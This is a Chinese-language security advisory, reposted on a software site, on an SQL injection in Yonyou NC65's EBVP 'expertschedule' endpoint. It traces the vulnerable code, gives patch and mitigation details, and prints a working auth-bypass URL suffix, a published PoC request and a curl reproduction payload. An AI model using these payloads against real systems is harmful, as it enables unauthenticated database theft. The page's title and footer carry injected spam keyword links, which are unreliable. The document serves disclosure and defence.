91网首页-91网页版-91网在线观看-91网站免费观看-91网站永久视频-91网站在线播放

LOGO OA教程 ERP教程 模切知識(shí)交流 PMS教程 CRM教程 開(kāi)發(fā)文檔 其他文檔  
 
網(wǎng)站管理員

用友NC系統(tǒng)SQL注入漏洞安全通告

admin
2025年4月12日 19:12 本文熱度 174

用友NC系統(tǒng)SQL注入漏洞安全通告

一、漏洞概述

漏洞編號(hào):暫未分配
漏洞類(lèi)型:SQL注入
影響組件:電子商務(wù)平臺(tái)(EBVP模塊)
危險(xiǎn)等級(jí):高危
CVSS評(píng)分:9.8(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)


二、漏洞詳情

1. 漏洞成因

通過(guò)/ebvp/expeval/expertschedule;1.jpg接口傳遞可控參數(shù)pkevalset時(shí),后端代碼未對(duì)輸入進(jìn)行有效過(guò)濾,導(dǎo)致攻擊者可構(gòu)造惡意SQL語(yǔ)句實(shí)現(xiàn)任意數(shù)據(jù)查詢(xún)。 下圖為用友NC漏洞預(yù)警(發(fā)現(xiàn)24年的老洞了(資產(chǎn)幾乎打補(bǔ)丁了),閑著沒(méi)事分析下)

關(guān)鍵代碼路徑

// EvalScheduleController.java
public String expertschedule(@RequestParam String pkevalset) {
    return evalScheduleService.getEvalSetScheInfoByPk(pkevalset);
}

// EvalScheduleQueryServiceImpl.java
public List<EvalSetVO> getEvalSetScheInfoByPk(String pk) {
    return iEvalSetWsQueryService.getEvalSetScheInfoByPk(pk); // 未過(guò)濾直接傳參
}

// MDBaseDAO.java
public List<Object> queryBillsImp(String whereCondStr) {
    String sql = "SELECT * FROM eval_schedule WHERE pk = '" + whereCondStr + "'"// 直接拼接
    return mdbaseDao.retrieveByClouse(sql); // 執(zhí)行SQL
}

2. 技術(shù)細(xì)節(jié)

  • 注入點(diǎn)分析pkevalset參數(shù)在5層方法調(diào)用后被拼接入SQL語(yǔ)句. 根據(jù)漏洞預(yù)警定位到具體路由,簡(jiǎn)單看下Ebvp業(yè)務(wù)下的過(guò)濾器 EbvpRequestFilter
?
  • 我們只需要 URL 里有這些后綴或者url 就可以繞過(guò)權(quán)限校驗(yàn)(懂的都懂) 接下來(lái)定位到 EvalScheduleController 控制器下 expertschedule 屬性的具體方法先傳參“pkevalset”(無(wú)限制),調(diào)用 service 對(duì)象的getEvalSetScheInfoByPk 方法

跟進(jìn) getEvalSetScheInfoByPk 方法,定位到 EvalScheduleQueryServiceImpl 類(lèi) 可以看到類(lèi)方法 getEvalSetScheInfoByPk 調(diào)用了 IEvalSetWsQueryService 實(shí)例的getEvalSetScheInfoByPk 方法

繼續(xù)跟進(jìn)IEvalSetWsQueryService 實(shí)例的 getEvalSetScheInfoByPk 方法 調(diào)用 this.queryMDVOByPks 方法進(jìn)行數(shù)據(jù)查詢(xún)

往上翻翻 EvalSetQueryServiceImpl 繼承自 DefaultQueryServiceImpl

故DefaultQueryServiceImpl 類(lèi)大概率定義了queryMDVOByPks方法,如下

到MDPersistenceService類(lèi)中去找queryBillOfVOByCond方法,可以看到return到MDBaseDAO對(duì)象的queryBillOfVOByCond方法

跟進(jìn)MDBaseDAO對(duì)象的queryBillOfVOByCond方法,new了一個(gè)VOQueryPersister對(duì)象調(diào)用queryBillsImp方法

跟進(jìn)queryBillsImp方法,可以看到將whereCondStr參數(shù)拼接到SQL語(yǔ)句中,后續(xù)new一個(gè)MDMultiTableDAO 對(duì)象調(diào)用retrieveByClouse方法,將whereCondStr參數(shù)傳入該方法

跟進(jìn)retrieveByClouse方法,可以看到執(zhí)行數(shù)據(jù)庫(kù)查詢(xún)操作

  • 繞過(guò)機(jī)制:通過(guò)1' OR 1=1--等經(jīng)典注入語(yǔ)法繞過(guò)基礎(chǔ)過(guò)濾
  • 數(shù)據(jù)暴露:可獲取ALL_USERS表全量數(shù)據(jù)(示例POC)

三、影響評(píng)估

1. 受影響版本

  • 用友NC65全版本(含最新補(bǔ)丁版本)

  • 其他版本需結(jié)合代碼審計(jì)確認(rèn)

    已公布POC內(nèi)容

GET /ebvp/expeval/expertschedule;1.jpg?pkevalset=1'+OR+1111%3d(SELECT+COUNT(*)+FROM+ALL_USERS+T1,ALL_USERS+T2,ALL_USERS+T3,ALL_USERS+T4,ALL_USERS+T5)-- HTTP/1.1
HTTP/1.1
Host:  

2. 攻擊向量

  • 攻擊方式:遠(yuǎn)程無(wú)身份驗(yàn)證攻擊
  • 攻擊目標(biāo):數(shù)據(jù)庫(kù)敏感信息(用戶(hù)賬號(hào)、配置信息等)
  • 利用難度:低(公開(kāi)POC可用)

四、修復(fù)方案

1. 官方補(bǔ)丁

補(bǔ)丁名稱(chēng)
補(bǔ)丁編碼
校驗(yàn)碼
發(fā)布日期
NC65專(zhuān)家調(diào)度請(qǐng)求防SQL注入補(bǔ)丁
NCM_NC6.5_000_109902_20240116_CP_399718758
f056abc8f5f7c5408f2c7abc21f07e4df2f80735ec1f11203f9dfbed49cdfe16
2024-01-16

部署步驟

  1. 登錄用友NC控制臺(tái)
  2. 進(jìn)入【系統(tǒng)管理】→【補(bǔ)丁管理】
  3. 上傳補(bǔ)丁文件并校驗(yàn)
  4. 重啟應(yīng)用服務(wù)器

2. 臨時(shí)緩解措施

  • 對(duì)pkevalset參數(shù)進(jìn)行嚴(yán)格的SQL注入過(guò)濾
  • 啟用Web應(yīng)用防火墻(WAF)規(guī)則攔截惡意請(qǐng)求
  • 限制接口訪問(wèn)權(quán)限至授權(quán)用戶(hù)

五、驗(yàn)證方法

1. 漏洞復(fù)現(xiàn)(僅供測(cè)試環(huán)境)

curl -X GET \
  'http://target/ebvp/expeval/expertschedule;1.jpg?pkevalset=1%27+OR+1%3D1--' \
  -H 'Host: example.com'

成功特征:返回包含ALL_USERS表數(shù)據(jù)的響應(yīng)

2. 補(bǔ)丁驗(yàn)證

SELECT version FROM ncm_patch WHERE patch_code = 'NCM_NC6.5_000_109902_20240116_CP_399718758';

若返回有效記錄則表明補(bǔ)丁已安裝


六、擴(kuò)展分析

1. 攻擊鏈推演

用戶(hù)請(qǐng)求 → 參數(shù)注入 → SQL拼接 → 數(shù)據(jù)庫(kù)執(zhí)行 → 敏感數(shù)據(jù)回顯

2. 類(lèi)似漏洞預(yù)防建議

  • 實(shí)施OWASP ESAPI輸入驗(yàn)證框架
  • 使用JPA/Hibernate等ORM框架的預(yù)編譯功能
  • 建立定期代碼安全審計(jì)機(jī)制

七、參考資料

  1. 用友官方安全公告:https://www.yonyou.com/security
  2. SQL注入防護(hù)指南:OWASP Cheat Sheet Series
  3. CVE-2024-XXXX(待分配)

:本文檔涉及攻擊技術(shù)僅用于授權(quán)滲透測(cè)試和安全研究,請(qǐng)遵守相關(guān)法律法規(guī)。


閱讀原文:https://mp.weixin.qq.com/s/7YAlGWyQH_jkVjPWjNvNPA


該文章在 2025/4/14 9:27:28 編輯過(guò)
關(guān)鍵字查詢(xún)
相關(guān)文章
正在查詢(xún)...
點(diǎn)晴ERP是一款針對(duì)中小制造業(yè)的專(zhuān)業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國(guó)內(nèi)大量中小企業(yè)的青睞。
點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對(duì)港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場(chǎng)、車(chē)隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理,結(jié)合碼頭的業(yè)務(wù)特點(diǎn),圍繞調(diào)度、堆場(chǎng)作業(yè)而開(kāi)發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體,是物流碼頭及其他港口類(lèi)企業(yè)的高效ERP管理信息系統(tǒng)。
點(diǎn)晴WMS倉(cāng)儲(chǔ)管理系統(tǒng)提供了貨物產(chǎn)品管理,銷(xiāo)售管理,采購(gòu)管理,倉(cāng)儲(chǔ)管理,倉(cāng)庫(kù)管理,保質(zhì)期管理,貨位管理,庫(kù)位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號(hào)管理軟件。
點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi),不限功能、不限時(shí)間、不限用戶(hù)的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 国产不卡在线播放 | 日本1区在线观看 | 国产高清乱理 | 中文字幕不卡精 | 日本高清不卡视频 | 国产精品一区 | 日本xxxx色视 | 国内精品伊人 | 91福利国产在 | 欧美一区二区一 | 精品国产亚洲性色 | 成人总合网| 麻花豆传| 91网视频网 | 青青草原国产在 | 国内综合在线 | 91免费国| 国产专区一区 | 日本一二三本道 | 日本中文字幕一本 | 日韩在线1区精品 | 成人一区二区三区 | 日本大片免费一级 | 国产黄页网址大全 | 国产精品秘入口免 | 区二区视频免费看 | 国产高清视频色拍 | 国产va免费影院 | 日韩福利在线观看 | 国产一区二区xxx | 国产亚洲sss | 欧美日韩中文无限码 | 国内自拍小视频 | 国产人妖的免 | 国产精品官网 | 91福利在线播放 | 精品欧美一区二区视 | 国内自产一区视频 | 国产91原创视频 | 九九热国| 18日韩亚洲|